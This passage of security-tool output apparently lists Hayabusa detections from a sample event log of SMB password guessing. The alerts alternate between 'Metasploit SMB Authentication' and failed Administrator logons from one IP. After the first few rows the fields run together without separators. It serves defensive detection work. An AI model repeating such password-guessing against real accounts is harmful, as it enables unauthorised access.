2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Dujj8A7wwzAwzCp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NVDE3fIoUQfLn3cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16192016-09-20 01:50:18.128 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16202016-09-20 01:50:18.175 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: UlD48O0XpFUnuSmo : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16212016-09-20 01:50:18.175 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16222016-09-20 01:50:18.213 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: KyTPKuspADmLpv0L : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16232016-09-20 01:50:18.213 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16242016-09-20 01:50:18.260 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: BdIAPiH32ZbmCgTK : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16252016-09-20 01:50:18.260 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16262016-09-20 01:50:18.292 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 1dEiN2xOA4E9Wl5p : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16272016-09-20 01:50:18.292 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16282016-09-20 01:50:18.337 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: fBeAez2fLjXB0dk3 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16292016-09-20 01:50:18.337 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16302016-09-20 01:50:18.372 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: gQ45aeMDc3Snabvv : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16312016-09-20 01:50:18.372 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16322016-09-20 01:50:18.420 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: QWSYdr4lJlhCLMMW : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16332016-09-20 01:50:18.420 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16342016-09-20 01:50:18.462 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: RgxHY7072aUCdfa0 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16352016-09-20 01:50:18.462 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16362016-09-20 01:50:18.504 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 9yKhEodJDTVCGdIG : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16372016-09-20 01:50:18.504 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16382016-09-20 01:50:18.597 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Z0odyPQmvkGRNWZF : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16392016-09-20 01:50:18.597 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16402016-09-20 01:50:18.630 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: b5uRpG0fxCK75DPV : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16412016-09-20 01:50:18.630 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16422016-09-20 01:50:18.666 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: d9dcEzpJRW5YA8Bj : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16432016-09-20 01:50:18.666 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16442016-09-20 01:50:18.712 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Hv3B9bwB1YIaBa6N : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16452016-09-20 01:50:18.712 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16462016-09-20 01:50:18.743 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: lJf9Obml4aVxE5zp : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16472016-09-20 01:50:18.743 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16482016-09-20 01:50:18.776 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: mvnSOaRSkGU6Uf5q : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16492016-09-20 01:50:18.776 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16502016-09-20 01:50:18.808 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: JSAkZsZsv0SaLKaO : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16512016-09-20 01:50:18.808 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16522016-09-20 01:50:18.847 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: r6rnM6QbwfbbrcGy : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16532016-09-20 01:50:18.847 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16542016-09-20 01:50:18.888 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: RX0GW7K5wdQJUx4Y : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16552016-09-20 01:50:18.888 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16562016-09-20 01:50:18.920 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Xm7CpD5i735McsvS : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16572016-09-20 01:50:18.920 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16582016-09-20 01:50:18.959 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: bHxjZsnR25J47Ez8 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16592016-09-20 01:50:18.959 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16602016-09-20 01:50:18.999 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: J1JWj91m79FyykH6 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16612016-09-20 01:50:18.999 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16622016-09-20 01:50:19.043 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: h9i0GncOzpz5REWp : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16632016-09-20 01:50:19.043 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16642016-09-20 01:50:19.085 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: BODZRJ6G3xxw29VJ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16652016-09-20 01:50:19.085 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16662016-09-20 01:50:19.127 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: SJ2lq4piINfmI7Qe : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16672016-09-20 01:50:19.127 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16682016-09-20 01:50:19.167 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: NqDeXdOitJ3WY8w4 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16692016-09-20 01:50:19.167 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16702016-09-20 01:50:19.217 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: FnoHQf7QDxoI4tel : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16712016-09-20 01:50:19.217 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16722016-09-20 01:50:19.261 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: FqkbgrtBa5VFxPry : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16732016-09-20 01:50:19.261 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16742016-09-20 01:50:19.300 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: TMD57GtY15bfWBre : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16752016-09-20 01:50:19.300 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16762016-09-20 01:50:19.350 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: e3lT9UgWr82PcAjf : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16772016-09-20 01:50:19.350 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16782016-09-20 01:50:19.388 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: SpwhTfFlvvccnI5N : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16792016-09-20 01:50:19.388 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16802016-09-20 01:50:19.432 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 10CfKdnvWf4UVuME : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16812016-09-20 01:50:19.432 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16822016-09-20 01:50:19.539 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: YYLMax3okIqntHM1 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16832016-09-20 01:50:19.539 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16842016-09-20 01:50:19.602 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: qk9TPAK51EdVORwY : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16852016-09-20 01:50:19.602 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16862016-09-20 01:50:19.670 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: aVKRUnNu2nGslW7P : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16872016-09-20 01:50:19.670 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16882016-09-20 01:50:19.720 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ZJ2AYRLcMbMVixg6 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16892016-09-20 01:50:19.720 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16902016-09-20 01:50:19.759 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 6Sl9ucxM2Nu3xjNq : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16912016-09-20 01:50:19.759 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16922016-09-20 01:50:19.801 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: AFeBGB6qA7OaYV7l : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16932016-09-20 01:50:19.801 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16942016-09-20 01:50:19.837 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: KLUEKG9CzQYsH3Vp : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16952016-09-20 01:50:19.837 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16962016-09-20 01:50:19.875 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: vVZ44YKdRYY59zaC : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16972016-09-20 01:50:19.875 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16982016-09-20 01:50:19.921 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: umU8pDDZFvvUVsHY : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16992016-09-20 01:50:19.921 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17002016-09-20 01:50:19.965 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Nn7rA0uRegtHgaF1 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17012016-09-20 01:50:19.965 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17022016-09-20 01:50:20.008 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 2dgiakCKweT4GUGD : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17032016-09-20 01:50:20.008 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17042016-09-20 01:50:20.039 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: kptipiLujNVePYfy : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17052016-09-20 01:50:20.039 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17062016-09-20 01:50:20.091 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: plaXJ1rEGpU3SzV2 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17072016-09-20 01:50:20.091 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17082016-09-20 01:50:20.132 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: I4pALF2luLfg36GC : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17092016-09-20 01:50:20.132 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17102016-09-20 01:50:20.173 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ZLO4cufbFcRhRy8b : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
